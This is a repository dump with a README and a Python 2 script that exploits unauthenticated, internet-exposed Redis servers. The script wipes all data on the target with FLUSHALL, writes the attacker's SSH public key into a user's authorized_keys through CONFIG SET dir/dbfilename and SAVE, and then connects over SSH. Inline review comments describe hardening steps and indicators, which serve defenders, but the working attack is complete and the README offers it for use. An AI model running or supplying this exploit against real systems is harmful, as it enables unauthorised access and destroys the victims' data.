├── README.md
└── redis.py


/README.md:
--------------------------------------------------------------------------------
1 | # Redis-Server-Exploit
2 | This will give you shell access on the target system if the Redis server is misconfigured and exposed to the internet without any authentication. The script depends on three conditions, each of which an administrator can remove: the server accepts commands without `requirepass`/ACL authentication, port 6379 is reachable from untrusted networks, and the Redis process can write into the target user's `~/.ssh` directory.
3 |
4 | # Disclaimer
5 | This exploit is purely intended for educational purposes. I do not want anyone to use this exploit to actually hack into computers or do other illegal things, so I cannot be held responsible for any illegal use. If you don’t agree, then you are not allowed to use/run/see the exploit… so leave it immediately.
6 |
7 | # Prerequisites
8 | 1. A valid username on the target system
9 |
10 | # Things to keep in mind
11 | 1. This script assumes SSH is on its default port, 22/TCP
12 | 2. This script assumes the Redis server is on its default port, 6379/TCP
13 | 3. The IP address of the target system and a user of the target system are passed to the script as arguments
14 | 4. The script uses libraries such as termcolor, so install them before running.
15 |
16 | # When would you need this?
17 | When you get something like this:
18 | Nmap scan report for (127.0.0.1)
19 | Host is up (0.27s latency).
20 | PORT STATE SERVICE VERSION
21 | 6379/tcp open redis Redis key-value store
22 |


--------------------------------------------------------------------------------
/redis.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#Author : Avinash Kumar Thapa aka -Acid
#Twitter : https://twitter.com/m_avinash143
#####################################################################################################################################################

# Review notes (defensive reading of this script):
# - Python 2 only: it uses the `print` statement.
# - It drives the local `redis-cli`, `ssh-keygen` and `ssh` binaries through
#   os.system(); nothing here speaks the Redis protocol directly.
# - No password or ACL user is ever passed to redis-cli, so every step below
#   only works against a server that accepts unauthenticated commands.
# - What it abuses is configuration, not a code flaw: CONFIG SET dir/dbfilename
#   followed by SAVE makes the server write its RDB snapshot to a path chosen
#   by the client. Hardening: keep `protected-mode` on, `bind` to loopback or
#   a private interface, firewall 6379/tcp, require authentication
#   (`requirepass` / ACLs), deny CONFIG to ordinary clients, and run
#   redis-server as a dedicated account that cannot write to any user's
#   ~/.ssh. Redis 7.0 and later also reject runtime changes to `dir` and
#   `dbfilename` unless `enable-protected-configs` has been turned on.

import os
import os.path
from sys import argv
from termcolor import colored


# Exactly two positional arguments are required (target IP, account name);
# any other count makes this unpacking raise ValueError before anything runs.
script, ip_address, username = argv


# The two locations checked for a local redis-cli binary.
PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'

def ssh_connection():
    """Start an interactive ssh session to username@ip_address.

    Uses the private key at $HOME/.ssh/id_rsa and ssh's default port (no -p
    is passed). Both module-level values are concatenated unquoted into the
    command line, so shell metacharacters in the script's own arguments are
    interpreted by the local shell.
    """
    shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address
    os.system(shell)

if os.path.isfile(PATH) or os.path.isfile(PATH1):
    try:
        print colored('\t*******************************************************************', "green")
        print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
        print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green")
        print colored('\t*******************************************************************', "green")
        print "\n"
        print colored("\t SSH Keys Need to be Generated", 'blue')
        # No -f/-N options are given, so ssh-keygen prompts for the file name
        # and passphrase; the later steps assume the default $HOME/.ssh/id_rsa
        # was accepted. The key comment "acid_creative" ends up in the public
        # key line, which makes it a string to search for in authorized_keys
        # files during triage.
        os.system('ssh-keygen -t rsa -C \"acid_creative\"')
        print colored("\t Keys Generated Successfully", "blue")
        # Wraps the public key in blank lines and stores it in public_key.txt.
        # NOTE(review): presumably so the key sits on a line of its own once
        # it is embedded in the binary snapshot - confirm.
        os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt")
        # FLUSHALL deletes every key in every database on the target: data
        # loss is a side effect of this script, and an unexpected FLUSHALL
        # from an unfamiliar client is worth alerting on.
        cmd = "redis-cli -h " + ip_address + ' flushall'
        cmd1 = "redis-cli -h " + ip_address
        os.system(cmd)
        # -x makes redis-cli read the last argument from stdin, so the padded
        # key file becomes the value of the key `cracklist`.
        cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist'
        os.system(cmd2)
        # cmd3 sets dbfilename to backup.db, but cmd5 overrides it before SAVE
        # runs, so cmd3 has no lasting effect.
        cmd3 = cmd1 + ' config set dbfilename "backup.db" '
        # Points the snapshot directory at /home/<username>/.ssh/ (assumes home
        # directories live under /home) and the snapshot name at
        # authorized_keys, then forces a SAVE. What lands on disk is an RDB
        # file, not a clean authorized_keys: a file at that path that starts
        # with the RDB magic bytes "REDIS" is a strong indicator of this
        # technique.
        cmd4 = cmd1 + ' config set dir' + " /home/"+username+"/.ssh/"
        cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
        cmd6 = cmd1 + ' save'
        os.system(cmd3)
        os.system(cmd4)
        os.system(cmd5)
        os.system(cmd6)
        # The script never restores dir/dbfilename, so `CONFIG GET dir` and
        # `CONFIG GET dbfilename` on a suspected server still show the
        # tampered values; presumably any later snapshot is written to the
        # same path.
        print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
        ssh_connection()

    # Bare except: also swallows KeyboardInterrupt and SystemExit. os.system()
    # reports failure through its return value, which is ignored throughout,
    # so a failed command does not reach this handler.
    except:
        print "Something went wrong"
else:
    # Neither redis-cli location exists on the local machine.
    print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")


--------------------------------------------------------------------------------